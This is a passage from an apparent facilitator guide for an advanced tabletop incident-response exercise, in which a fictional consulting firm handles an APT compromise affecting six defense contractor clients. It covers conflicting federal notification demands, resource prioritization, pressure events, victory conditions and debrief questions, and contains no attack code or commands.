- FBI counterintelligence wants investigation preservation (delay client notification)
- Defense Security Service demands immediate disclosure (clearance obligations)
- Players must navigate contradictory federal guidance with incomplete information
- Client Environment Diversity:
- Six different defense contractors with varying security requirements
- Some allow on-site remediation, others refuse access during federal investigation
- Different classification levels (CONFIDENTIAL, SECRET, TOP SECRET) require different handling
- CMMC compliance levels vary across clients, affecting remediation approach
- Ambiguous Attribution:
- Initial indicators suggest criminal espionage, later evidence points to nation-state
- Some attack patterns match known APT, others appear unique
- Players must make federal coordination decisions with uncertain attribution
- Resource Constraints:
- Limited threat hunting team can’t simultaneously remediate all six client environments
- Must prioritize clients based on incomplete damage assessment
- Some clients demand immediate attention, others are more patient
- Red Herrings:
- Legitimate cloud administrative actions by employees that appear suspicious
- False positive alerts from security tools due to normal consulting operations
- Vendor portal access from legitimate third-party integration that appears unauthorized
- Client network activity from approved penetration testing that mimics lateral movement
Remove Access to Reference Materials:
- No MITRE ATT&CK framework lookup during gameplay
- No federal regulation quick-reference guides
- No pre-defined response templates
- Players must recall knowledge of:
- Living-off-the-land techniques and detection methods
- Federal security clearance notification requirements
- Defense Security Service clearance review processes
- APT behavior patterns and persistence mechanisms
Justification Requirements:
Players must provide detailed written justification for:
- Federal notification timing decisions (with specific regulatory citations from memory)
- Client prioritization for remediation resources (with risk-based reasoning)
- Security clearance hearing evidence (demonstrating understanding of federal expectations)
- Threat intelligence sharing scope (balancing community security with business reputation)
Advanced Challenge Round Structure
Round 1: Ambiguous Initial Discovery (45-50 min)
- Evidence is intentionally contradictory - some indicators suggest criminal ransomware, others point to APT
- Legitimate employee cloud actions are mixed with attacker activity
- Vendor portal compromise timeline is unclear due to log gaps
- Players must develop investigation strategy with high uncertainty
- Early decisions about federal notification made with incomplete information
Round 2: Multi-Client Crisis with Resource Constraints (50-55 min)
- Six client environments need simultaneous remediation
- Threat hunting team can only address two clients in depth per round
- Must prioritize based on incomplete damage assessment
- Federal investigators demanding evidence but some clients won’t provide access
- Conflicting federal guidance creates no-win notification scenarios
Round 3: Security Clearance Hearing & Attribution Pivot (55-65 min)
- Initial attribution assessment proves incorrect - must revise federal coordination
- Defense Security Service clearance hearing requires justifying all previous decisions
- Some clients independently discover compromise and question notification delays
- Threat intelligence sharing opportunity conflicts with business reputation management
- Final decisions about business recovery vs. enhanced security investment
Advanced Pressure Events
T+20 (Round 1): Employee reports receiving legitimate cloud administration notification that looks identical to suspicious activity. How do players differentiate legitimate from malicious?
T+35 (Round 1): Vendor portal provider shares access logs, but 6-week gap exists during critical compromise period. Must make federal notification decision without complete evidence.
T+15 (Round 2): Client A demands immediate on-site remediation. Client B refuses access until FBI completes investigation. Client C wants detailed forensic report before deciding. Threat hunting team can only support one immediately.
T+40 (Round 2): Defense Security Service asks why client notification was delayed (if applicable) or why FBI investigation was compromised by early notification (if applicable). Players must justify decision with regulatory citations.
T+25 (Round 3): Attribution analysis reveals attack is more sophisticated than initially assessed - nation-state instead of criminal. All previous federal coordination may have involved wrong agencies. How to adjust?
T+50 (Round 3): Major client discovers compromise independently through their own threat hunting. They question why InnovaTech didn’t notify them earlier. Must justify notification timeline decisions with incomplete information from earlier rounds.
Advanced Victory Conditions
Technical Victory (High Bar):
- Complete threat elimination verified through independent third-party assessment
- Enhanced security architecture addressing living-off-the-land techniques, cloud service abuse, and vendor portal risks
- Contributed actionable threat intelligence to defense industrial base community
- Documented lessons learned demonstrating sophisticated APT understanding
Business Victory (High Bar):
- Security clearances maintained with no suspension period
- At least 4 of 6 defense contractor client relationships preserved
- Government consulting business revenue maintained above 80% of pre-incident levels
- Enhanced security positioning attracts new government clients despite public compromise
Learning Victory (High Bar):
- Justified all federal notification decisions with specific regulatory requirements (recalled from memory)
- Demonstrated understanding of conflicting federal agency priorities and navigation strategies
- Explained living-off-the-land detection challenges and behavioral analysis approaches
- Articulated trusted third-party risk management and lateral movement prevention
- Balanced business survival with national security obligations throughout scenario
Advanced Facilitation Challenges
When Players Struggle with Ambiguity:
Don’t resolve uncertainty for them. Instead: “Federal investigators also don’t have complete information yet. How do incident responders make critical decisions with incomplete evidence? What’s your decision framework?”
When Players Request Unavailable Information:
Enforce constraints: “You don’t have access to MITRE ATT&CK lookup right now. Based on your understanding of APT behavior, what techniques would you expect and how would you detect them?”
When Players Avoid Difficult Trade-Offs:
Force decision: “You have one threat hunting team and three clients demanding immediate remediation. Federal investigators need evidence from Client A, but Client B has the most classified data exposure. Client C is threatening contract termination. You must choose - which client gets resources first and why?”
When Players Rely on Pre-Defined Responses:
Remove safety net: “There are no template responses for this situation. You need to develop original strategy addressing: federal coordination, client remediation prioritization, security clearance demonstration, and business continuity. What’s your approach?”
Advanced Debrief Topics
- Decision-Making Under Uncertainty: How did incomplete information affect federal notification and client prioritization decisions?
- Regulatory Conflict Navigation: What strategies help navigate contradictory requirements from FBI and Defense Security Service?
- Living-Off-The-Land Detection: Without reference materials, what APT techniques did you recall and how would you detect them?
- Resource Prioritization Ethics: How did you balance competing client demands with limited threat hunting resources?
- Attribution Impact: How did changing understanding of adversary (criminal vs. nation-state) affect response strategy?
- Security Clearance Demonstration: What evidence convinces federal investigators of complete security improvement?
- Trusted Third-Party Responsibility: What are the ethical obligations when consulting firm compromise affects client classified environments?
- Business vs. Security Trade-Offs: When should organizations prioritize complete threat remediation over business survival?
- Threat Intelligence Sharing: How can compromised organizations contribute to community security despite reputational concerns?
- Lessons Learned Application: What specific security improvements would prevent similar vendor portal compromises?